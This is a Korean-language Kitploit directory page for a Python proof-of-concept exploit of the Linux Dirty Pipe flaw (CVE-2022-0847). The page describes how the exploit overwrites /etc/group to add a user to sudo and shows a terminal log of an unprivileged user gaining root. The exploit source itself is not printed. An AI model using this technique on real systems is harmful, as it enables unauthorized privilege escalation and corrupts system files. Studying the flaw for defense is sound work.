Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/0xeremus/dirty-pipe-poc
Privilege EscalationVulnerability AnalysisExploitationPenetration TestingBinary Exploitation
GitHub0xeremus/dirty-pipe-poc

dirty-pipe-poc

CVE-2022-0847 Dirty Pipe 취약점에 대해 Sudo에 사용자를 추가하는 POC 익스플로잇

저장소 보기
214년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2022-0847 Dirty Pipe 취약점을 이용한 Sudo 사용자 추가 POC 익스플로잇

이 저장소는 Max Kellermann이 발견한 취약점, 설명 및 익스플로잇을 기반으로 하며, 모든 내용은 여기에서 찾을 수 있습니다.

다른 사람들과 마찬가지로 저도 가장 간단하게 재현할 수 있는 권한 상승(Priv Esc)을 가지고 놀아야 했는데, 블로그 게시물에서 모든 것을 잘 설명해 주고 있습니다.

저는 익스플로잇을 Python으로 번역하여 더 잘 이해하려고 했지만, 이는 C 익스플로잇을 그대로 복사한 것으로 Sudo 권한 상승이 하드코딩되어 있습니다.

요구 사항

Python 3.10 (os.splice 호출 사용으로 인해)

문제점

/etc/group 파일을 손상시켜 sudo 항목 바로 다음 줄에 씁니다. 하지만 root가 되면 복사본을 사용하여 수정할 수 있습니다.

/etc/group의 복사본을 /tmp/group_backup에 저장합니다.

시연

root@kitploit:~
test@kali:/home/user/working$ whoami
test
test@kali:/home/user/working$ sudo whoami
test is not in the sudoers file.  This incident will be reported.
test@kali:/home/user/working$ python3.10 poc.py
[*] Dirty PIPE POC [*]
[*] Exploit will add test to sudoers
[*] Finding offset of sudo entry in /etc/group
[*] Found sudo group offset
[*] Confirmed it is not last.
[*] Opening /etc/group
[*] Opening PIPE
[*] Contaminating flags of pipe buffer
[*] 65536 bytes written to pipe
[*] 65536 bytes read from pipe
[*] Splicing byte from /etc/group to pipe
[*] Spliced 1 bytes
[*] Altering group to add test
[*] 6 bytes written to /etc/group
test@kali:/home/user/working$ su test
Password:
test@kali:/home/user/working$ sudo whoami
root
test@kali:/home/user/working$
도구 다운로드